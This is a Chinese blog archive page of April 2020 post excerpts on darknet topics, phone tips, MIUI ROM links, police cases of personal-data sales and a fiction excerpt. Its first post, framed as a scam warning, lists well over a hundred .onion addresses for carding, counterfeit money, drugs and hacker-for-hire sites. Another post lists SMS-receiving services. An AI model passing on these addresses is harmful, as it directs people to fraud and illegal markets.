网站首页 发表在 2020年04月 的所有文章

  • 暗网中有几个常见的中文诈骗网站,请一定注意!

    这些网站凡是在明网中看教程,然后根据明网中的一些导航很容易被引导到这些网站,涉及到钱的事,千万要克制住,天上掉馅饼也不会砸你头上! 一、中文导航网站(里面很多都是骗子网站,贼喊捉贼,特别是特价iphone,楼主就是通过这个网站指引到 "联合中文" 去的,被骗2000刀等价BTC,真实R了狗了) http://6jk5hsozsyspy3r7ypyruwkxyjga3dqffyywnjuestla4zmngkagqwad.onion 二、暗网中文担保交易市场,以前叫联合中文;你就记住,几个网站一伙骗子,什么百万美金、25%高价收比特币、低价iPhone、转账高汇报、拼多多招赌场转账员工,一律TMD都是骗子;什么?网站上面有大量可信留言?一伙专业骗子,天天在哪里写文案,他写不出来么?当然你要送钱当我白说!! http://zseoyu76ubm7abcjowe3xxn4ncvoxh4tckg6sxyqca4yf47wxlkwvpid.onion http://awzwevkx5iex43oh.onion 三、骗子举报网站,鬼佬搞的,里面的可信网站,特别是那个 “时光之路(中文市场)” 骗子网站!!记住,千万别信!这网站就是收钱办事的,东西你能信?这些人都贼喊捉着,左手打右手,谨慎! 丝绸之路3.1 http://silkroad7rn2puhj.onion/ 时光之路(中文市场) http://v7osuzczwawdb2fl.onion/ 比特币博彩 http://ycfgjwbfhnqvtclm.onion/ 黑客雇佣 http://3f5u2tieiigdqfcp.onion/ 四、其他骗子网站,本人未证实,但是一定小心 丝绸之路 http://silkdljpnclgdc2eecu5k3b55d5nikky7r4ljmpgapr5rnzeupsgbzid.onion/ 礼物卡 http://pmyd2kk3bkzw7gjwxfa7bcw7dfpo7yh2cbo352p4urdnog2uw3aowvad.onion/ 盗刷学院 http://bfgsu4uktbrbue3p.onion 帝国 http://srwmltrmx5uy3j74adakpixaptlr2lie42cshrlglsyy2mml24hcs4id.onion/ 现金卡 http://qeybpwjb7qn2ws2dein5zvsqgxral3shzsobgypzom4oihqfdlvl4uid.onion/ BitHacker http://ca3sii6jljzxqtwa4y3tunww5nfevwolrhn3cowzoobpciofldkdksqd.onion/ 王卡 http://pdixgp5s27jkd26pc2oenismtlumi7cbkywanlzvf62kcau6ro4hbsad.onion/ Richwallets http://vk5akdnqjyupp34lpz65oj4pomlu3jxz663tp4xmxnz22crt2qpojtid.onion/ SoS店 http://7j5c24itghnglnodmlg76j6dxo64hn5sgtrm7q7z4pv4hoexemr2pmid.onion/ 现金卡 http://wth474sv6ct4glwiowjipvr6ydeg6tbxlenxqibe5vno7ivmeqlumnid.onion/ 苹果店 http://fzbsxc4xa4w4tgzufa3knvuerjhmgvbnrd7igye5ot5mfywuiu3h3bad.onion/ Mr.Millionaire的 http://avn3xbtzud7bp75pjl42px6xkpj5vyiymnnz4htonlzcnm2uwcfcflyd.onion/ 暗网中文导航 http://6jk5hsozsyspy3r7ypyruwkxyjga3dqffyywnjuestla4zmngkagqwad.onion/ 比特币发生器 http://k35yauzkptmemr5nbwhyigihw2tfcytbvm4fq2yzfzyzi2nwh7ty7xyd.onion/ 市场 http://zseoyu76ubm7abcjowe3xxn4ncvoxh4tckg6sxyqca4yf47wxlkwvpid.onion/ 丝绸之路中文 http://shoptwgap2x3xbwy.onion/ 火炬 benzos http://mlj4iyalawb2ve2u.onion/ Kingdom_Come http://sgkvfgvtxjzvbadm.onion/ 银河女王 http://queeniooaa7sziqo.onion/ BANKOR http://bankors4d5cdq2tq.onion/ 黑暗市场 http://3twqowj7hetz3dwf.onion/ 市场2.0 http://gdaqpaukrkqwjop6.onion/ 团队高级 http://6thhimkhby4az3vz.onion/ LordPay转移 http://lordpay3t52brqwf.onion/ 1A质量信用卡商店 http://64fgu54a3tlsgptx.onion/ snovmarket http://snovzruogrfrh252.onion/ MoneyBingo http://uqzht2vfz5moumdd.onion/ EasyCash http://cr567grrbfpsyrz6.onion/ 地平线商店 http://horizontjsecs65q.onion/ $$ netAuth http://netauth3qialu2ha.onion/paypal 皇后现金 http://queencdcguevwedi.onion/ CC银河 http://galaxyaonv32reim.onion/ LordPay http://lordpay3t52brqwf.onion/ 足球金钱 http://footballsge4ocq3.onion/ BitEscrow http://vqbintgn7d2l7z43.onion/ 欣快遗忘 http://prepaid3jdde64ro.onion/ ChooseBetter http://choicecbtavv4cax.onion/ 欧洲联赛固定匹配 http://matchfixube5iwgs.onion/ Xmatches http://xmatchesfmhuzgfb.onion/ 古滕贝格打印 http://gutprintbqe72yuy.onion/ fakenote厂 http://fakenotefzutekmq.onion/ CounterfeitsGBP http://gbpoundzv2ot73eh.onion/ 钱4钱 http://mo4moybqbtmdex44.onion/ MoneyMaster http://moneydtbosp6ygfx.onion/ 黑和白 http://blackph5fuiz72bf.onion/ DW礼品卡 http://cww3ggjgpw56wter.onion/ 贝宝广场 http://22ppp3cboaonwjwl.onion/ moneymaster http://moneycvbr2ihsv3j.onion/ 黑与白卡 http://bnwcards4xuwihpj.onion/ 1000X你在只有24小时比特币 http://btcmultiimolu2fo.onion/ CCPPShop http://ccppshopsndysr45.onion/ CCSale http://ccsalewb7nujwnks.onion/ 克隆卡 http://clonedusbmna6mmw.onion/ clonexp http://clonexp3j3qdjdvp.onion/ CC供应商 http://cvendorzr7w3gdtq.onion/ 金融绿洲 http://financo6ytrzaoqg.onion/ Bisscrow http://jeuzg7g3xkslpf6k.onion/ 足球金钱 http://footballsge4ocq3.onion/ 市场 http://un62d2ywi33bho53.onion/ 市场 http://z57whuq7jaqgmh6d.onion/ 市场 http://gdaqpaukrkqwjop6.onion/ 市场 http://undrol7rt4yu5zzd.onion/ 市场 http://z57whuq7jaqgmh6d.onion/ EasyCoin http://easycoinsayj7p5l.onion/ 补证 http://slwc4j5wkn3yyo5j.onion/ 全球梳理论坛 http://qr5rw75na7gipe62.onion/ 比塞弗勒斯 http://bucepafkui6lyblt.onion/ 卡位 http://bitcardsqucnyfv2.onion/ KRYPTO PAYPAL http://kryptocg6rptq3wd.onion/ CC伙伴 http://r26liax2opq7knn3.onion/ 金融绿洲 http://oazis64odog3oorh.onion/ 比特币ESCROW http://escrow43eaperqie.onion/ BMG http://5xxqhn7qbtug7cag.onion/ 黑帽子休闲市场 http://32orihrbrhpk5x6o.onion/ USJUD http://usjudr3c6ez6tesi.onion/ 是!市场 http://sf6pmq4fur5c22hu.onion/ 美杜莎 http://medusas6rqee6x6e.onion/ 卡店 http://vgw2tqqp622wbtm7.onion/ 投注固定搭配 http://hbetshipq5yhhrsd.onion/ MultiEscrow http://mesc5wozvbdqbh2y.onion/ E-SHOP http://sn2vwdleom47kzqp.onion/ ESCROW - 服务 http://escrowkaw72yld57.onion/ 苹果店 http://h4y5xramfiooe3mz.onion/ 苹果店 http://applexgrqv3ihh6f.onion/ 苹果货品 http://applei7nkshrsnih.onion/ 传奇最佳店 http://bestshop3neaglxk.onion/ 阿里巴巴市场 http://tbaown3pd2sfidwx.onion/ 马格里布 http://mghreb4l5hdhiytu.onion/ 黑暗洋葱链接 http://trnf7mcbf6ko6h6w.onion/ ThePromisedLand http://stppd5as5x4hxs45.onion/ SafePay托管 http://safepayab3enffl2.onion/ 转储市场 http://marketdftsaewyfx.onion/ 黑与白卡 http://blackph5fuiz72bf.onion/ 绿色生态机床 http://zzq7gpluliw6iq7l.onion/ 比塞弗勒斯 http://bucepafkui6lyblt.onion/ GLOBAL梳理论坛 http://qr5rw75na7gipe62.onion/ 米德兰市 http://midcity7ccxtrzhn.onion/ OnionWallet http://onionw75v3imttfa.onion/ 贝宝美分http://paypalmkwfrikwlw.onion/ 贝宝美分http://ppcentrend4erspk.onion/ 贝宝美分http://nare7pqnmnojs2pg.onion/ 防伪中心http://countfe766hqe4qd.onion/ 防伪中心http://countercedyd3fbc.onion/ 防伪中心http://countfe766hqe4qd.onion/ 英雄榜http://armoryetem5mclq4.onion/ MultiEscrowhttp://mescrowvbbfqihed.onion/ RockSolid托管http://rsescrowtybxf43d.onion/ 比特币托管http://escrow26gdxwbzjb.onion/ 石灰http://limaconzruthefg4.onion/ 黑曼巴http://darkma35pkdraq2b.onion/ 租来的黑客http://hacker3r3cbxxbni.onion/ Tohrichrid http://aqdkw4qjwponmlt3.onion/ 最好的店 http://bestshop5zc7t3mf.onion/ 新妈 http://newshit5g5lc5coc.onion/ 7年来西藏 http://ppccpzam4nurujzv.onion/ 贝宝&CC http://xsqp76ka66qgue2s.onion/ 药品商店 http://w2k5fbvvlfoi62tw.onion/ 18街岗 http://h4gca3vb6v37awux.onion/ 1A质量 http://64fgu54a3tlsgptx.onion/ TOP BTC项目 http://topbtc.torpress2sarn7xw.onion/ 加倍您的BTC http://jmkxdr4djc3cpsei.onion/ 自动取款机 http://hcutffpecnc44vef.onion/ NLGrowers http://25ffhnaechrbzwf3.onion/ PP卡PIN http://ppcwp.torpress2sarn7xw.onion/ 伪造美元 http://qkj4drtgvpm7eecl.onion/ EasyCoin http://ts4cwattzgsiitv7.onion/ WaltCards http://waltcard74gwxkwj.onion/ easyvisa http://easyvisa5i67p2hc.onion/ 隐藏的钱包 http://nql7pv7k32nnqor2.onion/ CCSeller http://rtwtyinmq4wzzl6d.onion/ 余额不足卡 http://65px7xq64qrib2fx.onion/ 亚马逊礼品卡 http://nh5hqktdhe2gogsb.onion/ REAL卖方卡 http://ab2moc6ot2wkvua7.onion/ 卡HIGHBALANCE http://djn4mhmbbqwjiq2v.onion/ 起诉 http://agarthazdeeoph2a.onion/ Ë顾客 http://o6maqsjp23l2i45w.onion/ 贝宝&CC http://or7amhxzp7jc77xr.onion/ 贝宝&CC http://5jqvh54jxaftdav6.onion/ Safescrow http://mjturxqbtbncbv6i.onion/ 塑料市场 http://plasticzxmw4gepd.onion/ 苹果市场 http://applekpoykqqdjo5.onion/ 财务自由 http://cashoutxdrebmlj2.onion/ 财务自由 http://cashoutsdkyirll4.onion/ 是!市场 http://oqrz7kprdoxd7734.onion/ 比特币ESCROW http://arcbaciyv5xwguic.onion/ LECards http://lecards.torpress2sarn7xw.onion/ 网上市场 http://y2vrbi2eg6hpghmt.onion/ Empereor http://empererwidlf7kmb.onion/ CC KINGDOM http://cckingdomtmf7w7l.onion/ 暗面 http://dark73adlkrgr6u7.onion/ 团队高级 http://6thhimkhby4az3vz.onion/ 礼品卡市场 http://gmarketmtv62pdkp.onion/ 地下技术 http://ugtech6yot3p5n3u.onion/ 地下技术 http://ugtechlr4a6x5eab.onion/ 地下技术 http://ugtech3haoipeh3s.onion/ EMPIRE市场 http://mikffhylznwnc25o.onion/ 梳理 http://bfgsu4uktbrbue3p.onion/ 脱脂卡 http://777o6suetmexlesv.onion/ 融合卡 http://fusionvlc7cvltmy.onion/ SHOP卡 http://hqcarderxnmfndxk.onion/ 罗斯纳银行 http://rosnerqw5bcwfpfb.onion/ 金钱兄弟 http://moneytkfgglev7nr.onion/ 塑料鲨鱼 http://sharkjo6ramnxc6s.onion/ CCBAY http://ccbay3yanmktpr3s.onion/ CCBAY http://ccbay2jxd5dcobl2.onion/ CCBAY http://ccbay5gv4az6ewgv.onion/ 贝宝和信用卡 http://s7ccy6bman4zb6lh.onion/ Altbay http://6yid7vhjltxgefhm.onion/ 克鲁什市场 http://krushux2j2feimt6.onion/ NobleCards http://rjye7v2fnxe5ou6o.onion/ 加密泵及自卸博特 http://pumpdumppqgxwu4k.onion/ 1000X你在只有24小时比特币 http://xduacuj2tz4z23l6.onion/ 100X你在只有24小时比特币 http://multidxltunesmv6.onion/ 融合卡 http://fusifrndcjrcewvm.onion/ HootMixer http://tei5mg2z36lyq7jd.onion/ 克隆CC可信网站洋葱 http://2k3wty376idyonjt.onion/ SafePay托管 http://safepayjlz76pnix.onion/ 卡女王 http://efb6om7tze6aab25.onion/ PAYPAL账户 http://7uxohh5bat7kouex.onion/ 未经审查托管 http://dcm6xhlrfyaek4si.onion/ 1A质量信用卡 http://2222ppclgy2amp23.onion/ 三角洲市场 http://htqhl25peesc3lrm.onion/ AZ世界 http://azworldjqhsr4pd5.onion/ 黑与白卡 http://ju5iiyel2glsu3mh.onion/ 黑暗海市场 http://amgic2ym32odxor2.onion/ FRAUDFOX http://eushopsprwnxudic.onion/ DreamWeavers http://dreamrvfuqrpzn4q.onion/ 店铺用卡 http://cmhqrgwwpaxcquxp.onion/ 洛基市场 http://jlshyuiizag3m4hp.onion/login.php CC SHOP http://ccshophv5gxsge6o.onion/ MultiEscrow http://mescrowbshprfzgg.onion/ 德国银行 http://debankckcgq2exv5.onion/ 亚马逊礼品卡 http://gc4youec2ulsdkbs.onion/ DrugMarket http://4yjes6zfucnh7vcj.onion/ 消委会伙伴 http://4lq4prlyxiifarmj.onion/ 现金资产公司 http://3cash3sze3jcvvox.onion/ 想要更多站可加入交流群QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-29 3259
  • Firefox在线查密码数据泄露

    火狐出品的在线查询数据外泄,只要输入邮箱号,就能查询该帐号有没有被泄露过数据,感觉相当于差不多像以前的社工库,只不过不能查密文。 地址:https://monitor.firefox.com/ ...

    2020-04-28 590
  • 微博|性感大赛

    每月的性感大赛来了,出来看小姐姐了,各种性感身材看得眼花缭乱的 我都有种冲动相当渣男了。我要当渣男,我要祸害小姐姐! 算了还是做梦去吧比较现实,哈哈~下拉看评论就行了。 微博围观地址:https://weibo.com/5135109017/IEugqbSL0 ...

    2020-04-28 895
  • MIUI12首批内测机型ROM

    昨天申请了内测的直接去系统更新检测即可,特殊情况就下载对应的包手动选择更新吧,刷机有风险,小白不建议刷。 小米10 https://bigota.d.miui.com/20.4.27/miui_UMI_20.4.27_bceaa2c9de_10.0.zip 小米10Pro  https://hugeota.d.miui.com/20.4.27/miui_CMI_20.4.27_b415ab6c37_10.0.zip 小米9 https://hugeota.d.miui.com/20.4.27/miui_CEPHEUS_20.4.27_2b15191b0e_10.0.zip 小米8 https://hugeota.d.miui.com/20.4.27/miui_MI8_20.4.27_6e2adf8f87_10.0.zip 小米8 SE https://bigota.d.miui.com/20.3.26/miui_MI8SE_20.3.26_335c159428_10.0.zip 小米6 http://211.143.240.206:2008/bigota.d.miui.com/20.4.27/miui_MI6_20.4.27_12ed897867_9.0.zip 小米CC 9 Pro https://hugeota.d.miui.com/20.4.27/miui_TUCANA_20.4.27_abeb5b26f5_10.0.zip 小米MIX2S https://hugeota.d.miui.com/20.4.27/miui_MIMIX2S_20.4.27_11b1226b4c_10.0.zip 红米 K30 5G https://hugeota.d.miui.com/20.4.27/miui_PICASSO_20.4.27_e8d40f3110_10.0.zip 红米 K20 Pro及尊享版 https://hugeota.d.miui.com/20.4.27/miui_RAPHAEL_20.4.27_a29ff932d8_10.0.zip 红米 K20 https://bigota.d.miui.com/20.4.27/miui_DAVINCI_20.4.27_ad457695ab_10.0.zip 红米 Note7 https://hugeota.d.miui.com/20.4.27/miui_LAVENDER_20.4.27_d292fbcada_10.0.zip 红米Note5 https://hugeota.d.miui.com/20.4.27/miui_HMNote5_20.4.27_0bdc4d616e_9.0.zip ...

    2020-04-28 677
  • 国内外短信接码平台合集

    https://ch.freephonenum.com https://smsreceivefree.com https://zh.mytrashmobile.com https://www.receive-sms-online.info https://receiveasms.com https://sms-online.co/receive-free-sms https://receive-sms.com http://receivefreesms.com/ https://www.receivesmsonline.net/ https://www.freeonlinephone.org/ https://us-phone-number.com https://temporary-phone-number.com https://www.receivesms.co/ https://www.smstibo.com/ https://pingme.tel/receive-sms-online-cn/ http://receivefreesms.net/ http://receivesmsonline.in/ https://sms-receive.net/ https://www.receivesms.net/ https://www.yaysms.com/...

    2020-04-27 764
  • 教你如何预防罗志祥事件发生

    教程介绍 都说渣男有两部手机,其实一部手机也可以,第一个指纹解开它就是第一部手机,第二个指纹解开它就是第二部手机,今天分享一个避免罗志祥查手机事件的方法! 注意事项 因为毒蜂用的是小米10 Pro 所以小米手机为例,其他安卓手机可能也有这个功能,目前已知华为也有。 华为手机:打开设置->安全和隐私->隐私空间->设置新的图案密码+指纹 开启方法 打开设置->特色功能->手机分身->开启手机分身 跟着步骤设置密码+指纹(这个密码和指纹不能设置成和之前手机的一样,换个图案密码+换个手指头录指纹) 这个功能其实就相当于是双系统,用了那么久华为小米可能还有很多人不知道有这个功能,罗志祥用苹果后悔了吧~! 视频演示效果 微云:https://share.weiyun.com/5XZoy7t ...

    2020-04-27 585
  • 国内暗网黑市揭底:公安部公布年度10大犯罪典型案件,你的个人信息被卖过吗?

    暗网(DarkWeb),是深网(Deep web)的一个分支,也是由美国军方发起的一个科研项目,于2003年开始实施。 迈克尔·伯格曼将当今互联网上的搜索服务比喻为像在地球的海洋表面的拉起一个大网的搜索——巨量的表面信息可以通过这种方式被查找到,可这只是互联网的冰山一角。 那些还没有被传统搜索引擎索引的内容统称为深网,深网的深处,就是暗网了。 暗网是利用加密传输、P2P对等网络、多点中继混淆等,为用户提供匿名的互联网信息访问的一类技术手段,其最突出的特点就是匿名性。 正是因其与生俱来的隐匿特性,现在暗网被不法分子广泛运用于网络犯罪。 从个人行为的网络黑客服务、数字货币交易,到私售非法禁售物品(武器、毒品)等等,都依托于暗网。2019年5月,德国执法机构宣布,成功摧毁全球最大暗网交易平台“华尔街市场”(Wall Street Market)。 2017年,暗网黑市“阿尔法湾”(AlphaBay)在欧美多国联合行动中覆灭,26岁的联合创始人被捕,6天后在监狱的厕所里自缢身亡。 2013年,暗网黑市“丝绸之路”(Silk Road)创始人被捕,从2011年2月开始,90多万名注册用户在这里大约完成了价值总和1.2亿美元的地下交易。 近年来的这些有关于暗网的新闻,或多或少给了大家一种“暗网离我们很遥远”的错觉,但其实现实并非如此。 就在上个月,国内互联网曝出5亿微博用户个人数据在暗网打包售卖事件,引起舆论哗然。 数据泄露,如今已成为互联网行业典型故事之一,可以说信息泄露无时无刻不存在我们身边。暗网也是如此。日前,公安部公布了2019年以来侦破的10起侵犯公民个人信息违法犯罪典型案件 , 其中一些案件都涉及到了暗网非法活动,部分犯罪分子职业为工程师。一、“暗网”售卖银行开户、手机注册信息 2019年10月,江苏省南通市公安局网安部门工作发现,网民“wolinxuwei”多次在“暗网”交易平台出售银行开户、手机注册等公民个人信息,数量高达500余万条。 经查,“wolinxuwei”真实身份为林某。2019年初,林某在“telegram”群组结识某公司安全工程师贺某,林某以40万元的价格从贺某处购得银行开户、手机卡注册等各类公民个人信息350余万条,并通过“暗网”销售给经营期货交易平台、推销POS机的费某、王某等人,非法牟利70余万元。 11月12日至26日,南通公安机关先后在上海、苏州、武汉等地抓获犯罪嫌疑人林某、费某等犯罪嫌疑人11名,查获公民个人信息2000余万条。 二、“暗网”售卖社保数据 2019年4月,江苏南京公安机关接到某单位信息中心报案,称该中心管理的南京市1400余万条居民社保数据被非法盗取,并在“暗网”内售卖。 南京市公安局网安部门迅速查明盗取并在“暗网”上兜售社保数据的犯罪嫌疑人熊某及其上下线犯罪嫌疑人任某、薛某。 经查,任某为江苏某计算机技术有限公司工程师,在为南京市某单位进行信息系统漏洞测试时,利用系统漏洞盗取了居民社保数据,后伙同在柬埔寨的违法犯罪人员熊某在“暗网”上销售。其中,熊某将7万条数据卖给了薛某。 三、“暗网”黑客售卖客户信息 2018年11月,湖北武汉公安机关接到报案,称某汽车金融服务平台服务器被黑客入侵,包括身份证、手机号、家庭住址等情况在内的30余万条客户信息被盗取,被人以1比特币(时值3.5万元人民币)的价格在“暗网”上出售。 武汉市公安局网安部门经过深入侦查,于2019年1月22日在四川成都抓获犯罪嫌疑人吴某。吴某交代其利用暴力破解手段非法获取涉案网站后台管理权限。 四、“暗网”售卖银行用户信息 2019年6月,北京市公安局网安部门工作发现,网民“yuhong”在“暗网”贩卖国内某银行6.02万条用户个人信息。 北京市公安局网安部门缜密侦查,锁定犯罪嫌疑人高某。7月24日,北京公安机关将高某抓获归案。 高某交代其利用网站漏洞非法窃取了某银行等单位网站上存储的公民个人信息,截至被抓获,非法牟利3万余元。 五、内部员工非法售卖手机、征信信息 2018年12月,江苏省徐州市公安局网安部门工作发现,一网民在网上购买他人名下手机号码等公民个人信息。徐州网安部门以此入手,挖掘出一个以电信运营商、银行内部员工为源头的买卖公民个人手机信息、征信信息等信息的犯罪网络。 2019年1月2日,徐州公安机关组成23个抓捕组,分赴20余个省市开展集中收网行动,先后抓获嫌疑人45名,其中电信运营商、银行等部门内部人员20余名,查获各类公民个人信息43万余条,冻结涉案资金120余万元。 六、数据售卖+电信诈骗产业链 2018年12月,河南省开封市公安局网安部门工作发现,网民“夕阳红”通过微信群大肆贩卖手机机主姓名、财产信息、个人户籍资料等公民个人信息。 公安机关侦查掌握了一个由多部门“内鬼”与外部人员勾结,层层倒卖公民个人信息至下游电信网络诈骗、暴力催债、网络赌博等违法犯罪人员的侵犯公民个人信息犯罪网络。 开封公安先后抓获犯罪嫌疑人200余名,其中,电信运营商、社区干部、物流行业等内部人员80余名、暴力催收人员50余名,打掉非法暴力催收公司2个,查获公民个人信息1亿余条,冻结涉案资金1000余万元。 七、非法售卖高校学生信息 2019年3月,山东济南公安机关接山东某高校学生徐某等人举报,称其与同学个人身份信息被他人非法收集用于注册实名手机卡出售。 经查,济南某区联通公司某高校网点负责人葛某与其他高校网点业务员勾结,利用工作便利非法收集学生身份信息,开设实名手机卡后,向下游网络账号注册商、手机卡倒卖商刘某等人销售。 刘某等人在销售手机卡的同时,使用“猫池”设备利用贾某、徐某等人提供的注册工具,通过接码平台大量注册、解封网络账号出售牟利。济南公安机关先后抓获庄某、刘某在内的犯罪嫌疑人22名,查获上述人员非法注册QQ号150余万个、新浪微博号200余万个、“12306”账号100余万个。 八、虚假炒股平台 2019年初,江苏连云港公安机关侦破一起搭建虚假炒股平台实施诈骗案。 连云港市公安局网安部门随后顺线追踪,发现一条以证券公司内部人员范某等人为源头,层层倒卖股民信息至境内外网络炒股诈骗团伙的跨境侵犯公民个人信息犯罪链条,下游诈骗分子使用股民信息实施诈骗,涉案金额高达2220余万元。 连云港公安机关据此先后抓获犯罪嫌疑人53名,包括某证券公司内部员工2名,查获股民信息300余万条。 九、散播疫情防控人员信息 2020年1月,贵州省安顺市公安局网安部门工作发现,一新浪网民在网上举报有人在微信朋友圈内大肆传播疫情防控重点人员信息。 安顺网安部门立即开展网上侦查,查明该批涉疫情公民个人信息传播源头为安顺市天柱县某街道社区工作人员杨某,杨某在工作中获取了社区疫情防控人员信息后向好友发送。 安顺公安机关依法对杨某行政拘留15日、罚款5000元。 十、散播疫情相关信息 2020年1月,贵州省黔东南苗族侗族自治州公安局网安部门工作发现,一份名为“新型冠状病毒感染肺炎防控重点人员台账”在互联网上大肆传播。 黔东南州网安部门立即开展网上侦查,查明该台账由黔东南州凯里市某幼儿园员工王某在工作中获取,发布于小区微信群中,随后被层层转发,造成恶劣影响。 黔东南州公安机关依法对王某行政拘留12日、罚款5000元。 可以看到,上面十个案件中最后两起均与疫情有关。 事实上,新冠病毒疫情爆发后,暗网上的犯罪分子们也开始与时俱进。 有人在暗网上出售“新冠病毒疫苗”和“解药”,甚至新冠病毒样品,并号称全球包邮。 更多的人在暗网上卖起了口罩和检测试剂,有网友调侃称“我从来没想到有一天,连买口罩都需要上暗网。” 在这个黑市商人、骗子与黑客横行的匿名世界,犯罪行为无处不在。国内的犯罪分子也逐渐由主流的社交平台转战到暗网,但无论如何,法网恢恢疏而不漏,暗网终究不是犯罪分子能够逍遥法外的乌托邦。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-27 650
  • 传说中的暗网红房杀人直播,是真的吗?

    稍微了解暗网的朋友,想必都有听说过暗网红房。所谓红房就是指被血染红的房间,也就是说房子是被一个个死难者的鲜血染红的,听起来极其惊悚。 传说是基地组织或别的恐怖组织用来直播行刑,虐杀囚犯以赚取外快的地方 笔者自从浏览暗网以来,看到的红网应该不下10个,每个红房的样子基本上都是一个样,都是一个模板出来的,根本没法分辨哪个是真的红房,哪个是假的。 当然是否有真的红房存在,现在也没有定论,还没有切确的证据证明暗网红房的存在。 在暗网的搜索引擎candle搜索red room就可以看到一长串的红房地址: 随便打开一个网址,就可以看到暗网红房的样子,基本上都是长这样的: 整个网站的背景都是红色的,看起来有些惊悚,网站上会有一个倒计时,告诉你下一次杀人直播是什么时候,如果你想参与进去,可以选择不同的角色,当然不同的角色的价格是不同的,权利也是不同的 最低一级需要花费0.2个比特币,也就是8000人民币左右,只能观看; 第二级成为一个master,需要花费0.5个比特币,这时候你可以下命令如何虐待奴隶 最高一级就是指挥官,需要花费1个比特币,这时候,你就是这个房间里权利最大的人,可以为所欲为。 据称一位曾进入过Red Room的用户曾发帖子细致地描述他观看直播的经历,“一个强壮的男人根据Master(主人)的指示,用各种手段,一步一步残忍地虐杀了一名阿拉伯女性,让施暴者在镜头前挖出了她的双眼。” 这些都只是传说而已,并没有足够的证据更名红房是真实存在的,网上之所以把红房描述的如此恐怖,无外乎是为了吸引眼球罢了 当然,不管暗网红网是否真实存在,我都不希望大家真的花钱去红房观看所谓的直播杀人,因为如果红网是真的,那么你就是相当于是花钱买凶杀人,充当了一个刽子手,如果暗网红房是假的,那么你的比特币就被骗子骗走了。 所以大家看看就好,千万不要付款过去。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-27 5270
  • 访问暗网犯法吗?

    其实暗网并不是很神秘,只是被一些影视剧给神话了。 暗网这个说法其实很模糊,具体解释一下就是,用洋葱浏览器,输入以onion为后缀的域名网址而进行访问的网站,进入这些网站你不会直接访问服务器,而是通过中转节点,并且每次访问(甚至每个请求)的中间节点都可能不同。他的服务器就像被藏了起来,没人能定位到他在哪儿。 正是因为这种匿名性所以上面充斥着大量灰色交易。交易形式主要是通过比特币,一些中文网址可以用支付宝交易。 我说几个大型的交易网站(链接不敢放) 茶马古道,华尔街市场,梦想市场,丝绸之路 交易方式与网上购物没什么不同,下单付款发货,基本上交易的是虚拟物品。售卖的物品也是千奇百怪,没有比特币基本上无法交易,目前的汇率大概是1B~50000rmb。 还有更深的暗网应该就是大家想象中的那些更黑色的世界,这些网站基本上是邀请制,而且网址隔三差五的更换。 洋葱浏览器的下载已经有答主解释了,我就不再回答。另外访问这些网站首先要有梯子,也就是翻墙。这是基本常识,我也就不多说了。 先写这么多吧!有问题再更。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-26 1518
  • 浊世奇人

    一、第一个二货 谎言听上去都那么合情合理,真相却总是荒诞不经。 吴晋的生命中出现过三个最重要的二货,第一个是他的爸爸“赵子龙”。 当时世界上正在同时进行着两场超级内战,一场是美国的南北战争,另一场是大清的太平天国运动。两国的主政者,一位是五十五岁的林肯,一位是八岁的同治皇帝。五十五岁的林肯被战争搞得焦头烂额,八岁的同治皇帝无忧无虑地在皇宫里放风筝,开打的时候他妈杏儿还没进宫。 杏儿,大名杏贞,叶赫那拉氏,徽号慈禧。 “赵子龙”是为了躲避战乱逃亡到苗集的,带着他十七岁的小娇妻,小娇妻已身怀六甲。小两口受到了苗集百姓的热情款待。苗集人觉得他长得太清新脱俗了,像戏台上赵子龙,就叫他“赵子龙”了。 苗集人不会太多的词汇,只能用一个字来形容“赵子龙”——俊,用三个字形容他的小娇妻——俊得很。俊发“zun”的音,四声。小娇妻长得像白娘子,比戏台上的白娘子还俊,还白,还细嫩。虽然是逃亡至此,但小两口仍旧十分整洁光鲜,举手投足都体现着书香门第的风范。 因感恩于苗集乡亲的救助,“赵子龙”号召大家跟着他们一起跑,因为绿营军很快就会杀过来,他的家乡已经被绿营军屠了。 杯具的是,木有人信。 此地距离战场较远,苗集民风淳朴,百姓历年来响应朝廷号召,为剿灭叛军捐钱纳粮,筹集军饷,十分踊跃。镇上好几户人家世代都是绿营军,父死子继,全镇人都引以为荣。绿营军就是他们的子弟兵,怎么可能返回头来杀自己的父老乡亲?简直就是千古奇谈!可笑至极! “白娘子”说:“劝不动咱就走吧,该说的咱都说了。” “赵子龙”不忍看到善良的苗集百姓像家乡父老一样被屠戮,不顾妻子的劝阻,在集上奔走呼号,挨家挨户敲门,泣血相告,跪求大家逃命,终于凭实力犯了众怒。如此污蔑朝廷正规军,苗集百姓忍无可忍,终于翻脸了。小两口被几十个百姓追得满街乱窜。 “赵子龙”虽然有着赵子龙的俊秀,却没有赵子龙的身手,被愤怒的百姓当街摁倒,整洁的衣衫被撕扯的七零八落,英俊的脸庞被揍肥了一圈,鼻梁骨都打断了。大着肚子的“白娘子”也被抽了十几个嘴巴,白嫩的小脸被抽成了绯红,浑身被吐了十几口痰。 “我亲眼看见他们杀人了,我的父母兄弟都被他们杀了。快跑吧,再不跑就来不及了……” “赵子龙”喊得越响,众人下手就越重,最终他喊不出来了,放弃了。 苗集里长声色俱厉、义正辞严地对小两口进行了训斥。小两口认罪了,只求能放他们走。但里长和百姓不同意,正要绑了送衙门,绿营军到了。 里长和乡亲们把小两口扭送到了参将面前,揭发了他们造谣污蔑绿营军的罪行。参将很赞赏地表彰了里长和乡亲们,然后手起刀落,里长的脑袋一歪,倒挂在了脖子的一边,像个夜壶,鲜血斜喷出一丈多远。 里长这一生从未如此豪放过。 满街的惨叫此起彼伏地传来。现场乡亲们的心情无可描述,大脑中一片空白。那叫声中的绝望,只有过年杀猪的时候才能听到。人们终于亲眼目睹了小两口描述中的屠杀。几十名跪在地上的百姓像被收割的庄稼,一片一片倒在了绿营军的刀下。待宰的猪羊尚能在临死前发出生命中最后的绝唱,他们连呼喊和挣扎的勇气都没有了,胖揍“赵子龙”时的义愤填膺、满腔正义消失得无影无踪,在沉默中被驱逐出了这个世界。 小夫妻俩的膝盖被百姓的血染红。他们在家乡逃过了屠杀,却把命送在了苗集。“赵子龙”悔悟了,泪流满面地捧着小娇妻的脸,十分的愧疚、自责,“听你的就好了。” 